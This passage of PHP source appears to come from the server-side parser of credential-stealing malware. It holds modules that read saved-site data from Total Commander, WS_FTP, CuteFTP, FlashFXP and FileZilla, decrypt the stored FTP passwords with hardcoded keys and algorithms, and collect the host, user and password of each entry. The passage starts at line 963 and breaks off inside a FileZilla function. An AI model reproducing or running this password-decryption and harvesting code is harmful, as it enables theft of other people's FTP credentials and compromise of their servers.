963. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
964. // Windows/Total Commander
965.  
966. class module_wtc extends module
967. {
968. protected function decrypt($pass)
969. {
970. if (strlen($pass) <= 0)
971. return false;
972.  
973. if ($pass[0] == "!")
974. {
975. //$this->log->add("NOTIFY_MASTER_PASSWORD_CANNOT_DECRYPT");
976. return false;
977. }
978.  
979. if ((strlen($pass) % 2) != 0 || strlen($pass) <= 4)
980. {
981. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
982. return false;
983. }
984.  
985. $data = hextostr($pass);
986.  
987. if ($data === false)
988. {
989. $this->log->add('ERR_INVALID_HEX_STRING');
990. return false;
991. }
992.  
993. $crc = substr($data, strlen($data)-4);
994. $data = substr($data, 0, -4);
995. $seed = 0xcf671;
996.  
997. for ($i = 0; $i < strlen($data); $i++)
998. {
999. $k = myrand(8, $seed);
1000. $data[$i] = chr(((ord($data[$i]) << $k) & 0xff | (ord($data[$i]) >> (8-$k)) & 0xff ) & 0xff);
1001. }
1002.  
1003. $seed = 0x3039;
1004. for ($i = 0; $i < 256; $i++)
1005. {
1006. $k = myrand(strlen($data), $seed);
1007. $p = myrand(strlen($data), $seed);
1008. $c = $data[$k];
1009. $data[$k] = $data[$p];
1010. $data[$p] = $c;
1011. }
1012.  
1013. $seed = 0xa564;
1014. for ($i = 0; $i < strlen($data); $i++)
1015. $data[$i] = chr(ord($data[$i]) ^ myrand(0x100, $seed));
1016.  
1017. $seed = 0xd431;
1018. for ($i = 0; $i < strlen($data); $i++)
1019. $data[$i] = chr(ord($data[$i]) + 0x100 - myrand(0x100, $seed));
1020.  
1021. if (crc32b_str($data) != data_int32($crc))
1022. {
1023. $this->log->add("ERR_CRC32_PASS_MISMATCH");
1024. return false;
1025. }
1026.  
1027. return $data;
1028. }
1029.  
1030. protected function import_item($stream, $id)
1031. {
1032. if ($id != 0x0000)
1033. {
1034. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
1035. return false;
1036. }
1037.  
1038. $parsed_ini = parse_ini($stream->read_str());
1039. foreach ($parsed_ini as $section)
1040. {
1041. if (!is_array($section))
1042. continue;
1043. $host = assign($section["host"]);
1044. $user = assign($section["username"]);
1045. $pass = $this->decrypt(assign($section["password"]));
1046. $dir = assign($section["directory"]);
1047. $this->add_ftp(append_dir($host, $dir), $user, $pass);
1048. }
1049. return true;
1050. }
1051. }
1052.  
1053. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
1054. // WS_FTP
1055.  
1056. class module_ws_ftp extends module
1057. {
1058. protected function decrypt($pass)
1059. {
1060. if (!strlen($pass))
1061. return false;
1062.  
1063. if ($pass[0] == '_')
1064. {
1065. // new decryption algorithm
1066. $data = base64_decode(substr($pass, 1), true);
1067.  
1068. if (!strlen($data))
1069. return false;
1070.  
1071. $des_key = chr(0xE1).chr(0xF0).chr(0xC3).chr(0xD2).chr(0xA5).chr(0xB4).chr(0x87).chr(0x96).
1072. chr(0x69).chr(0x78).chr(0x4B).chr(0x5A).chr(0x2D).chr(0x3C).chr(0x0F).chr(0x1E).
1073. chr(0x34).chr(0x12).chr(0x78).chr(0x56).chr(0xAB).chr(0x90).chr(0xEF).chr(0xCD);
1074.  
1075.  
1076. $iv = substr($des_key, 16);
1077. $data = mcrypt_decrypt(MCRYPT_3DES, $des_key, $data, MCRYPT_MODE_CBC, $iv);
1078.  
1079. if (!strlen($data))
1080. {
1081. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
1082. }
1083.  
1084. return ztrim($data);
1085. } else
1086. {
1087. // old decryption algorithm
1088. $offset = 1;
1089. $result = "";
1090. $i = 33;
1091.  
1092. while ($i < strlen($pass)-1)
1093. {
1094. $eax = ord($pass[$i]);
1095. if ($eax > 0x39)
1096. $eax = _BF_SUB32($eax, 0x37);
1097. else
1098. $eax = _BF_SUB32($eax, 0x30);
1099.  
1100. $ebx = _BF_SHL32($eax, 4);
1101.  
1102. $eax = ord($pass[$i+1]);
1103. if ($eax > 0x39)
1104. $eax = _BF_SUB32($eax, 0x37);
1105. else
1106. $eax = _BF_SUB32($eax, 0x30);
1107. $ebx = _BF_ADD32($ebx, $eax);
1108.  
1109. $eax = ord($pass[$offset]) & 0x3f;
1110. $ebx = _BF_SUB32(_BF_SUB32($ebx, $eax), $offset-1);
1111. $offset++;
1112.  
1113. if ($offset > 33)
1114. break;
1115.  
1116. $result .= chr($ebx);
1117.  
1118. $i += 2;
1119. }
1120.  
1121. return ztrim($result);
1122. }
1123. }
1124.  
1125. protected function process_ini($value)
1126. {
1127. if (!strlen($value))
1128. return;
1129.  
1130. $parsed_ini = parse_ini($value);
1131. foreach ($parsed_ini as $section)
1132. {
1133. if (!is_array($section))
1134. continue;
1135. if (nonempty($section["host"]) &&
1136. nonempty($section["uid"]) &&
1137. nonempty($section["pwd"]))
1138. {
1139. // detect connection type
1140. $conntype = assign($section["conntype"]);
1141.  
1142. switch ($conntype)
1143. {
1144. //case "3": $conntype = "ftpes://"; break;
1145. case "4": $conntype = "sftp://"; break;
1146. //case "5": $conntype = "ftps://"; break;
1147. default: $conntype = "ftp://"; break;
1148. }
1149.  
1150. $host = strip_quotes($section["host"]);
1151. $user = strip_quotes($section["uid"]);
1152. $pass = $this->decrypt(strip_quotes($section["pwd"]));
1153.  
1154. $this->add_ftp($conntype.append_port_dir($host, $section["port"], $section["dir"]), $user, $pass);
1155. }
1156. }
1157. }
1158.  
1159. protected function import_item($stream, $id)
1160. {
1161. if ($id != 0x0000)
1162. {
1163. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
1164. return false;
1165. }
1166. $this->process_ini($stream->read_str());
1167. return true;
1168. }
1169. }
1170.  
1171. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
1172. // CuteFTP Pro/Home/Lite
1173.  
1174. class stream_cute extends stream
1175. {
1176. function read_bytestring()
1177. {
1178. if (!$this->state)
1179. return false;
1180. $len = $this->read_byte();
1181. if ($len == 0xff)
1182. return $this->read_strlen($this->read_word());
1183. else
1184. return $this->read_strlen($len);
1185. }
1186. }
1187.  
1188. class module_cuteftp extends module
1189. {
1190. private $CuteFTPItem = array();
1191.  
1192. function handle_host($stream)
1193. {
1194. if ($stream->state)
1195. if (nonempty($this->CuteFTPItem["host"]) && nonempty($this->CuteFTPItem["user"]) && nonempty($this->CuteFTPItem["pass"]))
1196. {
1197. $this->add_ftp(append_port_dir(ftp_force_ssh($this->CuteFTPItem["host"], assign($this->CuteFTPItem['proto']) == '3'), $this->CuteFTPItem["port"], $this->CuteFTPItem["dir"]), $this->CuteFTPItem["user"], $this->CuteFTPItem["pass"]);
1198. }
1199. }
1200.  
1201. function char_swap(&$v, $a, $b)
1202. {
1203. $t = $v[$a];
1204. $v[$a] = $v[$b];
1205. $v[$b] = $t;
1206. }
1207.  
1208. function DecryptPassNew($pass)
1209. {
1210. $key = chr(0x32).chr(0x24).chr(0x11).chr(0x52).chr(0x02).chr(0x6F).chr(0x4F).chr(0x78);
1211. $iv = chr(0).chr(0).chr(0).chr(0).chr(0).chr(0).chr(0).chr(0);
1212.  
1213. if (!strlen($pass) || ((strlen($pass) % 8) != 0))
1214. return "";
1215.  
1216. // change endianity
1217. for ($i = 0; $i < strlen($pass); $i+=4)
1218. {
1219. $this->char_swap($pass, $i, $i+3);
1220. $this->char_swap($pass, $i+1, $i+2);
1221. }
1222.  
1223. $pass = mcrypt_decrypt(MCRYPT_BLOWFISH, $key, $pass, MCRYPT_MODE_CBC, $iv);
1224. if (!strlen($pass))
1225. {
1226. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
1227. }
1228.  
1229. // restore endianness
1230. for ($i = 0; $i < strlen($pass); $i+=4)
1231. {
1232. $this->char_swap($pass, $i, $i+3);
1233. $this->char_swap($pass, $i+1, $i+2);
1234. }
1235.  
1236. return ztrim($pass);
1237. }
1238.  
1239. function DecryptPass($pass)
1240. {
1241. for ($i = 0; $i < strlen($pass); $i++)
1242. $pass[$i] = chr(ord($pass[$i]) ^ 0xc8);
1243. return $pass;
1244. }
1245.  
1246. function Handle3_4($stream, $Is4)
1247. {
1248. $this->CuteFTPItem["host"] = $stream->read_bytestring();
1249. $this->CuteFTPItem["user"] = $stream->read_bytestring();
1250. $this->CuteFTPItem["pass"] = $stream->read_bytestring();
1251. if ($Is4 > 1)
1252. $this->CuteFTPItem["pass"] = $this->DecryptPass($this->CuteFTPItem["pass"]);
1253. $this->CuteFTPItem["dir"] = $stream->read_bytestring();
1254.  
1255. $stream->read_bytestring(); // LocalFolder
1256. $this->CuteFTPItem["port"] = $stream->read_dword(); // Port
1257. $stream->read_dword(); // LoginMethod
1258. $stream->read_dword(); // TransferType
1259. $stream->read_dword(); // HostType
1260.  
1261. $stream->read_dword(); // ConnectionRetries
1262. $stream->read_dword(); // RetriesDelay
1263. $stream->read_dword(); // MaxIndexSize
1264. $stream->read_dword(); // UseLogicalParentDir
1265. $stream->read_dword(); // AutoCacheIndex
1266. $stream->read_dword(); // UseAutoRenameScheme
1267.  
1268. $stream->read_dword(); // SmartKeepAlive
1269. $stream->read_dword(); // Unknown
1270. $stream->read_dword(); // SimpleDirListing
1271. $stream->read_dword(); // AddSiteToShell
1272. $stream->read_dword(); // UsePasvMode
1273. $stream->read_dword(); // RenameSchemeType
1274.  
1275. $stream->read_bytestring(); // Description
1276.  
1277. $this->handle_host($stream);
1278. $this->CuteFTPItem = array();
1279.  
1280. $stream->read_dword(); // UseFirewallSettings
1281. $stream->read_dword(); // EnableFilter
1282.  
1283. $stream->read_dword(); // Unknown
1284. $stream->read_dword(); // Unknown
1285. $stream->read_dword(); // SaveSessLogToFile
1286. $stream->read_dword(); // CacheSiteResume
1287.  
1288. $unk_subversion = $stream->read_dword(); // Unknown
1289. $stream->read_dword(); // ApplyFiltersLocal
1290. $stream->read_dword(); // ApplyFiltersRemote
1291. $stream->read_dword(); // ApplyFiltersFolder
1292. $stream->read_dword(); // EnableRemFilters
1293. $stream->read_bytestring(); // RemoteFilter
1294.  
1295. $stream->read_dword(); // ApplyFiltersUploads
1296. $stream->read_dword(); // ApplyFiltersDownloads
1297. $stream->read_dword(); // ApplyFiltersSiteToSite
1298. $stream->read_dword(); // CaseSensitiveFiltering
1299.  
1300. // Filter mask
1301. $FiltCount = $stream->read_word();
1302. for ($i = 0; $i < $FiltCount; $i++)
1303. $stream->read_bytestring(); // Filter
1304.  
1305. // Filter NOT mask
1306. $FiltCount = $stream->read_word();
1307. for ($i = 0; $i < $FiltCount; $i++)
1308. $stream->read_bytestring(); // NotFilter
1309.  
1310. if ($Is4 > 1)
1311. {
1312. if ($unk_subversion == 1)
1313. {
1314. $stream->read_skip(8);
1315. } else
1316. {
1317. $stream->read_dword(); // EnableLocalFilters
1318. $stream->read_dword(); // LastSessionStart
1319. $stream->read_dword(); // LastSessionEnd
1320. }
1321. }
1322.  
1323. if ($Is4 == 4)
1324. $stream->read_dword(); // CheckFileSizeOnDownl
1325. }
1326.  
1327. function Handle65_66($stream, $ver)
1328. {
1329. $this->CuteFTPItem["host"] = $stream->read_bytestring();
1330. $stream->read_dword(); // LoginMethod
1331. $this->CuteFTPItem["user"] = $stream->read_bytestring();
1332. $this->CuteFTPItem["pass"] = $this->DecryptPass($stream->read_bytestring());
1333. $stream->read_bytestring(); // Description
1334.  
1335. $this->CuteFTPItem["proto"] = $stream->read_dword(); // Protocol
1336. $this->CuteFTPItem["port"] = $stream->read_dword(); // Port
1337. $stream->read_dword(); // ServerType
1338. $stream->read_dword(); // DataConnType
1339. $stream->read_dword(); // TransferType
1340.  
1341. $this->CuteFTPItem["dir"] = $stream->read_bytestring();
1342.  
1343. $this->handle_host($stream);
1344. $this->CuteFTPItem = array();
1345.  
1346. $stream->read_bytestring(); // LocalFolder
1347.  
1348. $stream->read_dword(); // CachingOptions
1349. $stream->read_dword(); // Unknown
1350. $stream->read_dword(); // UpldCaseOptions
1351. $stream->read_dword(); // Unknown
1352. $stream->read_dword(); // EnableFiltering
1353. $stream->read_dword(); // Unknown
1354. $stream->read_dword(); // ApplyFiltersToFolders
1355. $stream->read_dword(); // EnableRemFilters
1356.  
1357. $stream->read_bytestring(); // RemoteFilter
1358. $stream->read_dword(); // Unknown
1359. $stream->read_dword(); // ApplyFiltersTransfers
1360. $stream->read_dword(); // Unknown
1361. $stream->read_dword(); // CaseSensFilters
1362.  
1363. // Filter mask
1364. $FiltCount = $stream->read_word();
1365. for ($i = 0; $i < $FiltCount; $i++)
1366. $stream->read_bytestring(); // Filter
1367.  
1368. // Filter NOT mask
1369. $FiltCount = $stream->read_word();
1370. for ($i = 0; $i < $FiltCount; $i++)
1371. $stream->read_bytestring(); // NotFilter
1372.  
1373. $stream->read_dword(); // Unknown
1374. $stream->read_dword(); // SiteConfOptions
1375. $stream->read_dword(); // ApplyAutoRename
1376. $stream->read_dword(); // RawListing
1377.  
1378. // Proxy
1379. $stream->read_word(); // Unknown
1380. $stream->read_bytestring(); // ProxyHost
1381. $stream->read_dword(); // ProxyPort
1382. $stream->read_bytestring(); // ProxyUser
1383. $stream->read_bytestring(); // ProxyPass
1384. $stream->read_dword(); // ProxyType
1385. $stream->read_dword(); // ProxyUseAuth
1386. $stream->read_dword(); // ProxyAuthType
1387. $stream->read_bytestring(); // ProxyUser@
1388.  
1389. // Proxy custom login sequence
1390. $FiltCount = $stream->read_word(); // LinesCount
1391. for ($i = 0; $i < $FiltCount; $i++)
1392. $stream->read_bytestring(); // SingleLine
1393.  
1394. // Socks
1395. $stream->read_word(); // Unknown
1396. $stream->read_bytestring(); // SocksHost
1397. $stream->read_dword(); // SocksPort
1398. $stream->read_bytestring(); // SocksUser
1399. $stream->read_bytestring(); // SocksPass
1400. $stream->read_dword(); // SocksType
1401. $stream->read_dword(); // SocksUseAuth
1402.  
1403. $stream->read_dword(); // ConnRetryAttmps
1404. $stream->read_dword(); // ConnRetryDelay
1405.  
1406. if ($ver == 0x66)
1407. $stream->read_dword(); // FTPPasswdProtect
1408. }
1409.  
1410. function Handle68_69_6c($stream, $Is69)
1411. {
1412. if ($Is69 >= 0x6c)
1413. {
1414. // 12 unknown flags
1415. $stream->read_dword();
1416. $stream->read_dword();
1417. $stream->read_dword();
1418. }
1419.  
1420. if ($Is69 >= 0x69)
1421. $stream->read_bytestring(); // TimeZone
1422.  
1423. $stream->read_dword(); // MaxConnPerSite
1424. $stream->read_dword(); // Flags
1425. $this->CuteFTPItem["host"] = $stream->read_bytestring();
1426. $stream->read_dword(); // LoginMethod
1427. if ($Is69 >= 0x6d)
1428. {
1429. $this->CuteFTPItem["user"] = $this->DecryptPassNew($stream->read_bytestring());
1430. $this->CuteFTPItem["pass"] = $this->DecryptPassNew($stream->read_bytestring());
1431. } else
1432. {
1433. $this->CuteFTPItem["user"] = $stream->read_bytestring();
1434. $this->CuteFTPItem["pass"] = $this->DecryptPass($stream->read_bytestring());
1435. }
1436. $stream->read_bytestring(); // description
1437.  
1438. $this->CuteFTPItem["proto"] = $stream->read_dword(); // Protocol
1439. $this->CuteFTPItem["port"] = $stream->read_dword(); // Port
1440. $stream->read_dword(); // ServerType
1441. $stream->read_dword(); // DataConnType
1442. $stream->read_dword(); // TransferType
1443.  
1444. $this->CuteFTPItem["dir"] = $stream->read_bytestring();
1445.  
1446. $this->handle_host($stream);
1447. $this->CuteFTPItem = array();
1448.  
1449. $stream->read_bytestring(); // LocalFolder
1450.  
1451. $stream->read_dword(); // CachingOptions
1452. $stream->read_dword(); // Unknown
1453. $stream->read_dword(); // UpldCaseOptions
1454. $unk_subversion = $stream->read_dword(); // Unknown
1455.  
1456. if ($unk_subversion == 2 && $Is69 == 0x68)
1457. $stream->read_skip(30);
1458.  
1459. $stream->read_dword(); // FilterFlags
1460.  
1461. $stream->read_bytestring(); // RemoteFilter
1462.  
1463. // Filter mask
1464. $FiltCount = $stream->read_word();
1465. for ($i = 0; $i < $FiltCount; $i++)
1466. $stream->read_bytestring(); // Filter
1467.  
1468. // Filter NOT mask
1469. $FiltCount = $stream->read_word();
1470. for ($i = 0; $i < $FiltCount; $i++)
1471. $stream->read_bytestring(); // NotFilter
1472.  
1473. $stream->read_dword(); // SiteConfOptions
1474. $stream->read_dword(); // ApplyAutoRename
1475. $stream->read_dword(); // NLSTList
1476.  
1477. if ($unk_subversion == 2 && $Is69 == 0x68)
1478. $stream->read_skip(1);
1479.  
1480. // Proxy
1481. $stream->read_word(); // Unknown
1482. $stream->read_bytestring(); // ProxyHost
1483. $stream->read_dword(); // ProxyPort
1484. $stream->read_bytestring(); // ProxyUser
1485. $stream->read_bytestring(); // ProxyPass
1486. $stream->read_dword(); // ProxyType
1487. $stream->read_dword(); // ProxyUseAuth
1488. $stream->read_dword(); // ProxyAuthType
1489. $stream->read_bytestring(); // ProxyUser@
1490.  
1491. // Proxy custom login sequence
1492. $FiltCount = $stream->read_word(); // LinesCount
1493. for ($i = 0; $i < $FiltCount; $i++)
1494. $stream->read_bytestring(); // SingleLine
1495.  
1496. // Socks
1497. $stream->read_word(); // Unknown
1498. $stream->read_bytestring(); // SocksHost
1499. $stream->read_dword(); // SocksPort
1500.  
1501. // !NB: both encrypted in 0x6d+ versions
1502. $stream->read_bytestring(); // SocksUser
1503. $stream->read_bytestring(); // SocksPass
1504.  
1505. $stream->read_dword(); // SocksType
1506. $stream->read_dword(); // SocksUseAuth
1507.  
1508. $stream->read_dword(); // ConnRetryAttmps
1509. $stream->read_dword(); // ConnRetryDelay
1510. $stream->read_dword(); // FTPPasswdProtect
1511. }
1512.  
1513. protected function process_bookmarks($stream, $BookmarksCount)
1514. {
1515. $CSeparator = $stream->read_word();
1516.  
1517. if (!$BookmarksCount)
1518. return;
1519.  
1520. if ($CSeparator == 0xffff)
1521. {
1522. $stream->read_word(); // Separator2
1523. $stream->read_strlen($stream->read_word()); // TypeName
1524. }
1525.  
1526. for ($i = 0; $i < $BookmarksCount; $i++)
1527. {
1528. $stream->read_dword(); // Ident
1529. $stream->read_bytestring(); // BookmarkName
1530. $stream->read_bytestring(); // RemPath
1531. $stream->read_bytestring(); // LocPath
1532. $stream->read_dword(); // UseDefPath
1533. $stream->read_word(); // Separator
1534. }
1535. }
1536.  
1537. protected function process_dat($value, $isquick)
1538. {
1539. if (!strlen($value))
1540. return false;
1541.  
1542. $stream = new stream_cute($value, $this->log);
1543.  
1544. if (!$isquick)
1545. {
1546. // check .dat version
1547. if (($stream->datalen < 17) || ($stream->read_dword() != 0x130))
1548. {
1549. // not a cute ftp file
1550. return true;
1551. }
1552. $stream->read_byte(); // SubVersion
1553. $stream->read_dword(); // NextID
1554. $CEntriesCount = $stream->read_dword();
1555. $stream->read_dword(); // DefaultID
1556. } else
1557. {
1558. if ($stream->datalen < 8)
1559. return false;
1560. $CEntriesCount = $stream->read_dword();
1561. $stream->read_dword();
1562. }
1563.  
1564. $CType = ''; $CSeparator = 0; $j = 0;
1565. while ($stream->state)
1566. {
1567. // Types & Entries
1568. if (($CSeparator == 0xffff) || ($CType == ''))
1569. {
1570. // New type found
1571. if ($CSeparator != 0xffff)
1572. $stream->read_word(); // First separator
1573. $stream->read_word(); // Unknown
1574.  
1575. // Type
1576. $CType = $stream->read_strlen($stream->read_word());
1577. $CSeparator = 0;
1578. } else
1579. {
1580. // Check if out parser supports certain object type
1581. if (($CType != 'CTreeItem') && ($CType != 'CSMFTPItem') && ($CType != 'CSMSite'))
1582. {
1583. $this->log->add("ERR_CUTEFTP_VER");
1584. return false;
1585. }
1586.  
1587. $stream->read_dword(); // Ident
1588. $stream->read_dword(); // ID
1589. $SubType = $stream->read_dword(); // Subtype
1590. $stream->read_dword(); // ParentID
1591. $this->CuteFTPItem["name"] = $stream->read_bytestring(); // ItemName
1592. $stream->read_dword(); // Icon
1593.  
1594. switch ($SubType)
1595. {
1596. case 0:
1597. // FtpItem
1598. $stream->read_dword(); // 0 - has bookmarks; 1 - has no bookmarks
1599. $stream->read_dword(); // Flags
1600. $this->process_bookmarks($stream, $stream->read_word());
1601.  
1602. $CObjVersion = $stream->read_dword();
1603.  
1604. // Select data handler
1605. switch ($CObjVersion)
1606. {
1607. case 0x01:
1608. case 0x03:
1609. case 0x04:
1610. $this->Handle3_4($stream, $CObjVersion); // 4.0, 4.1
1611. break;
1612. case 0x65:
1613. case 0x66:
1614. $this->Handle65_66($stream, $CObjVersion); // 1.0 Pro
1615. break;
1616. case 0x68:
1617. $this->Handle68_69_6c($stream, $CObjVersion); // 2.0 Pro
1618. break;
1619. case 0x69:
1620. $this->Handle68_69_6c($stream, $CObjVersion); // 3.0 Pro, 6.0 Home/Pro, 7.0 Home/Pro
1621. break;
1622. case 0x6c:
1623. $this->Handle68_69_6c($stream, $CObjVersion); // 8.0 Pro
1624. break;
1625. case 0x6d:
1626. $this->Handle68_69_6c($stream, $CObjVersion); // 8.3 Pro
1627. break;
1628. default:
1629. $this->log->add("ERR_CUTEFTP_VER: ".$CObjVersion);
1630. return false;
1631. }
1632.  
1633. $j = $j + 1;
1634. if ($j == $CEntriesCount)
1635. return true;
1636.  
1637. $CSeparator = $stream->read_word();
1638.  
1639. break;
1640. case 1:
1641. // TreeItem
1642. $stream->read_dword(); // ShowContents
1643. $stream->read_word(); // Unknown
1644. $stream->read_dword(); // Unknown
1645. $SubItemsCount = $stream->read_word();
1646.  
1647. for ($i = 0; $i < $SubItemsCount; $i++)
1648. $stream->read_dword(); // SubItem
1649.  
1650. $j = $j + 1;
1651. if ($j == $CEntriesCount)
1652. return true;
1653.  
1654. $CSeparator = $stream->read_word();
1655. break;
1656. default:
1657. $this->log->add("ERR_CUTEFTP_VER");
1658. return false;
1659. }
1660. }
1661. }
1662. if (!$stream->state)
1663. $this->log->add("ERR_CUTEFTP_DAT_PROCESS_ERROR");
1664.  
1665. return $stream->state;
1666. }
1667.  
1668. public function import_item($stream, $id)
1669. {
1670. switch ($id)
1671. {
1672. case 0x0000:
1673. // sm.dat
1674. $this->process_dat($stream->read_str(), false);
1675. break;
1676. case 0x0001:
1677. // quick connections
1678. $this->process_dat($stream->read_str(), true);
1679. break;
1680. default:
1681. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
1682. return false;
1683. }
1684. return true;
1685. }
1686. }
1687.  
1688. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
1689. // FlashFXP
1690.  
1691. class module_flashfxp extends module
1692. {
1693. protected function decrypt($pass, $key = 'yA36zA48dEhfrvghGRg57h5UlDv3')
1694. {
1695. if (!strlen($pass) || !strlen($key))
1696. return false;
1697.  
1698. $hex_str = hextostr($pass);
1699.  
1700. if ($hex_str === false)
1701. {
1702. $this->log->add('ERR_INVALID_HEX_STRING');
1703. return false;
1704. }
1705.  
1706. $result = '';
1707. $old = ord($hex_str[0]); $k = 0;
1708. for ($i = 1; $i < strlen($hex_str); $i++)
1709. {
1710. $new = ord($hex_str[$i]) ^ ord($key[$k++ % strlen($key)]);
1711. if ($old >= $new)
1712. $new--;
1713. $result .= chr($new-$old);
1714. $old = ord($hex_str[$i]);
1715. }
1716.  
1717. return $result;
1718. }
1719.  
1720. protected function process_ini($value, $id)
1721. {
1722. if ($id == 2)
1723. {
1724. // saved history
1725. $values = parse_lines($value);
1726. foreach ($values as $line)
1727. {
1728. $decrypted_line = $this->decrypt($line);
1729. $decrypted_line = substr($decrypted_line, strpos($decrypted_line, chr(4))+1);
1730. $split_values = explode(chr(5), $decrypted_line);
1731.  
1732. if (count($split_values) >= 5)
1733. {
1734. $host = trim($split_values[0]);
1735. $user = trim($split_values[1]);
1736. $pass = trim($split_values[2]);
1737. $port = trim($split_values[3]);
1738. $dir = trim($split_values[4]);
1739.  
1740. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
1741. }
1742. }
1743.  
1744. return;
1745. }
1746. $parsed_ini = parse_ini($value);
1747. foreach ($parsed_ini as $secname=>$section)
1748. {
1749. if (!is_array($section))
1750. continue;
1751. $host = assign($section['ip']);
1752. $user = assign($section['user']);
1753. if ($id == 1)
1754. $pass = $this->decrypt(assign($section['pass']), $secname);
1755. else
1756. $pass = $this->decrypt(assign($section['pass']));
1757. $dir = assign($section['path']);
1758. $port = assign($section['port']);
1759. $options = assign($section['options']);
1760. $proto = 0;
1761. if (strlen($options) >= 39)
1762. {
1763. if ($options[38] == '1')
1764. $proto = 1;
1765. }
1766. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 1), $port, $dir), $user, $pass);
1767. }
1768. }
1769.  
1770. protected function import_item($stream, $id)
1771. {
1772. if ($id != 0x0000 && $id != 0x0001 && $id != 0x0002)
1773. {
1774. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
1775. return false;
1776. }
1777. $this->process_ini($stream->read_str(), $id);
1778. return true;
1779. }
1780. }
1781.  
1782. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
1783. // FileZilla
1784.  
1785. class module_filezilla extends module
1786. {
1787. private $last_server = array();
1788. private $is_v3 = false;
1789. private $is_converted = false;
1790.  
1791. private function dec_utf8($value)
1792. {
1793. if (!strlen($value))
1794. return '';
1795. if ($this->is_converted)
1796. return utf8_decode($value);
1797. else
1798. return Utf8ToWin($value);
1799. }
1800.  
1801. protected function decrypt($pass)
1802. {
1803. if (!strlen($pass) || (strlen($pass) % 3 != 0))
1804. return false;
1805.  
1806. $key = 'FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ';
1807. $p = ((int_divide(strlen($pass), 3)) % 0x2d);
1808.  
1809. $result = '';
1810.  
1811. $len = int_divide(strlen($pass), 3);
1812. for ($i = 0; $i < $len; $i++)
1813. {
1814. $num = substr($pass, $i*3, 3);
1815. if (!is_num($num))
1816. return false;
1817.  
1818. $result .= chr(ord($key[$p++ % strlen($key)]) ^ intval($num));
1819. }
1820.  
1821. return $result;
1822. }
1823.  
1824. protected function fix_dir($value)
1825. {
1826. $value = trim($value);
1827.  
1828. if (!strlen($value))
1829. return '';
1830.  
1831. if (strpos($value, ' ') !== false)
1832. {
1833. $dir_parts = explode(' ', $value);
1834. if (count($dir_parts) > 2 && ((count($dir_parts) % 2) == 0) && $dir_parts[1] === '0')
1835. {
1836. $result = '';
1837. for ($i = 2; $i < count($dir_parts); $i+=2)
1838. {
1839. if (strlen($dir_parts[$i+1]) && strlen($dir_parts[$i+1]) == intval($dir_parts[$i]))
1840. {
1841. $result .= '/'.$dir_parts[$i+1];
1842. } else
1843. {
1844. // something went wrong
1845. return $value;
1846. }
1847. }
1848. } else
1849. {
1850. return $value;
1851. }
1852. return $result;
1853. } else
1854. return $value;
1855. }
1856.  
1857. private function fix_entities($encoded_value)
1858. {
1859. if (!strlen($encoded_value))
1860. return '';
1861. if (strpos($encoded_value, '_zomgencodedentity_') === false)
1862. return $encoded_value;
1863.  
1864. return html_entity_decode(str_replace('_zomgencodedentity_', '&#', $encoded_value), ENT_COMPAT, 'Windows-1251');
1865. }
1866.  
1867. protected function read_xml_item($xml_array, $require_decryption)
1868. {
1869. $host = $this->fix_entities($this->dec_utf8(assign($xml_array['Host'])));
1870. $user = $this->fix_entities($this->dec_utf8(assign($xml_array['User'])));
1871. $pass = assign($xml_array['Pass']);
1872. // decrypt pass if required
1873. if (strlen($pass) && $require_decryption)
1874. {
1875. $pass = $this->decrypt($pass);
1876. }
1877. else
1878. $pass = $this->fix_entities($this->dec_utf8($pass));
1879. $port = $this->fix_entities($this->dec_utf8(assign($xml_array['Port'])));
1880. $protocol = $this->fix_entities($this->dec_utf8(assign($xml_array['Protocol'])));
1881. if ($protocol == '')
1882. {
1883. // Older XML files, SFTP protocol equals to ServerType=3
1884. $protocol = $this->fix_entities($this->dec_utf8(assign($xml_array['ServerType'])));
1885. if ($protocol == '3')
1886. $protocol = '1';
1887. else
1888. $protocol = '';
1889. }
1890. $dir = str_replace('%20', ' ', $this->fix_entities($this->fix_dir($this->dec_utf8(assign($xml_array['RemoteDir'])))));
1891.  
1892. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '1'), $port, $dir), $user, $pass);
1893.  
1894. foreach ($xml_array as $value)
1895. {
1896. if (is_array($value))
1897. $this->read_xml_item($value, $require_decryption);
1898. }
1899. }
1900.  
1901. protected function read_xml_last_server($xml_array, $parent_value)
1902. {
1903. $name = assign($xml_array['name']);
1904.  
1905. if ($name == 'Last Server Host') $this->last_server['host'] = $this->fix_entities($this->dec_utf8(assign($parent_value)));
1906. if ($name == 'Last Server Port') $this->last_server['port'] = $this->fix_entities($this->dec_utf8(assign($parent_value)));
1907. if ($name == 'Last Server Type') $this->last_server['protocol'] = $this->fix_entities($this->dec_utf8(assign($parent_value)));
1908. if ($name == 'Last Server Path') $this->last_server['dir'] = $this->fix_entities($this->dec_utf8(assign($parent_value)));
